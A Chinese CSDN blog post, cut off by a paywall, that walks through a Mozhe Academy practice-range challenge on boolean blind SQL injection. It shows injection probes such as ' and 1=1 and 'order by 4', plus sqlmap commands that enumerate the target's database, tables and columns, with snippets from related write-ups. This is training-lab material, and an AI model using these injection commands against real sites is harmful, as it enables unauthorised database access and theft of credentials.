墨者学院——SQL注入漏洞测试(布尔盲注)

已于 2022-02-26 23:40:17 修改
阅读量384 收藏 1
点赞数
分类专栏: 墨者学院 文章标签: sql 安全 web安全
于 2022-01-11 10:49:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lollipop_zhi/article/details/122416339
版权

  1. 启动靶场,熟悉的界面
    在这里插入图片描述

  2. 点击登录下方的维护通知

  3. 地址栏醒目的id出现了,尝试一下id =1’ and 1=1,空白页面
    在这里插入图片描述

  4. 直接开kali,上sqlmap
    输入sqlmap -u http://219.153.49.228:45239/new_list.php?id=1 --current -db
    得到数据库名称:stormgroup

  5. 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup --tables (这里地址和上面不一样是因为 为了记录过程我又重新开了靶场,但是我懒得改地址了……)
    输出 两个表格member和notice 显然看一下member
    在这里插入图片描述

  6. 输入 sqlmap -u http://219.153.49.228:47334/new_list.php?id=1 -D stormgroup -T member --columns
    输出

最低0.47元/天 解锁文章
今天也要好好学习!
关注
专栏目录
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场中的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
墨者学院-----SQL注入漏洞测试(布尔盲注)
qq_43590351的博客
05-21 585
SQL注入漏洞测试(布尔盲注) 第一步判断注入点: 在url中输入单引号发现报错,再输入and1=1页面正常,and1=2报错 说明此url存在着SQL注入漏洞 http://219.153.49.228:48551/new_list.php?id=1 and 1=2 第二步判断字段数 利用order by 语句,值为4页面正常,5报错,说明有四个字段 http://219.153.49.228:48551/new_list.php?id=1 order by 4 第三步:猜解数据库的长度以及数据库名称
在线靶场-墨者-SQL注入1星-SQL注入漏洞测试(布尔盲注)
weixin_42079912的博客
07-18 889
背景介绍 一位热心的网友再次向“墨者安全工程师挑战,“墨者”工程师在注入时发现网页无回显,“墨者”工程师想了一会就注入完成拿到了key。 实训目标 1、掌握SQL注入原理; 2、了解MySQL的数据结构; 3、了解布尔盲注相关语句; 解题方法: 运用sqlmap工具对数据库进行爆破 1.判断注入点存在:python sqlmap.py -u “ip” 2.判断数据库名称:python sqlma...
墨者学院入门级SQL注入布尔盲注
wxdby的博客
12-05 571
首先,在打开这道题时,我们发现这里有一个用户登录。我们可以试着猜一下,我们成登录后,就出现Key了。这道题时SQL题。
墨者学院--SQL注入漏洞测试(布尔盲注)
老司机开代码的博客
08-03 608
文章目录题意解析注入过程爆数据库名爆表名爆字段名 今天做了一道墨者学院盲注题目。头皮发麻。 题意解析 要求是找出moezhe开头的32为的key。 先看一下题目: 开始一看是这个界面,第一感觉以为是post提交表单的注入漏洞,然后一顿操作猛如虎,结果人都傻了。接着,底下那个通知就一直在那晃荡,抱着试试看的心理点进去,结果就发现了新大陆。 ?id,多么亲切的老朋友啊。一下子就豁然开朗了。 通过...
mysql显错注入(渗透测试手工注入基本流程)
weixin_45698828的博客
10-20 1128
第一步:判断目标网站是否有sql注入漏洞。(盲注的核心)and 1=1 -> 页面有内容and 1=2 -> 页面没内容==> 网站是有sql注入漏洞了。第二步:判断网站的表的列数order by 1 --> 页面有内容,说明网站的表里面有1列。order by 2 --> 页面有内容,说明网站的表里面有2列。order by 3 --> 页面没有内容,说明网站的表里面没有3列。==> 只有2列。第三步:判断回显点(显错的核心)第四步:查询相关数据。
墨者学院-SQL注入漏洞测试布尔盲注
qq_47094508的博客
01-23 3127
手工测试和工具测试工具(sqlmap)工具使用参考连接https://www.anquanke.com/post/id/235846首先我们拿到题目之后会得到一个登录框这时候需要去寻找他的注入点,可以通过登陆键下方的提示进去,也可以使用工具一把梭这工具是真好用(火狐小插件) 当我们来到这个注入点的页面就可以用工具一把梭 首先爆他的库名 在爆表名 列名 抓内容 抓到之后md5解密,最终得到flag 手工测试首先判断注入点是否存在 盲注没有回显所以我们首先需要判断库名长度,通过测试最终
墨者学院-入门级-SQL注入漏洞测试(布尔盲注)-小白必看(超详细)
kitiu666的博客
08-26 4187
2020年8月25日,第五次渗透测试。 通过对sql语句进行注入,数据库的库名,表名,字段进步爆破,最终获得key。 准备需求: 1.windows系统pc 2.2.burpsuite(bp)抓包软件 3.sqlmap sql 数据库的爆破工具 1.进入靶场 ...
墨者未必黑——思想汇报 .docx
02-10
墨者未必黑——思想汇报 .docx
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者靶场 SQL注入漏洞测试(布尔盲注)
曹振国的博客
06-14 5187
初级 布尔盲注一、查看页面源代码,发现注入点二、sqlmap一把梭三、登录查看到key 一、查看页面源代码,发现注入点 二、sqlmap一把梭 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?id=1 查询库 ┌──(root????caozhenguo)-[~/桌面] └─# sqlmap -u http://219.153.49.228:40972/new_list.php?
墨者学院03 SQL注入漏洞测试(布尔盲注)
weixin_42789937的博客
01-24 438
墨者学院03 SQL注入漏洞测试(布尔盲注),脚本小子的SQL注入实战~
SQL注入-布尔盲注
weixin_45095113的博客
03-12 780
布尔盲注
sqlmap注入(布尔盲注
qq_43355651的博客
11-17 8286
本人小白 仅仅作为学习笔记 希望通过一次次的记录可以一次次的成长 sqlmap是一个自动化的sql注入工具,主要功能是扫描发现并利用注入漏洞 使用墨者学院的靶机进行测试 这里我们使用的是SQL注入漏洞测试(布尔盲注) 通过滚动条找到注入点 然后我们使用的是kali下的工具sqlmap sqlmap -u http://219.153.49.228:46473/new_lis...
SQLMAP 使用笔记
震山的博客
10-11 271
记一下 SqlMap 的使用
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究...总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值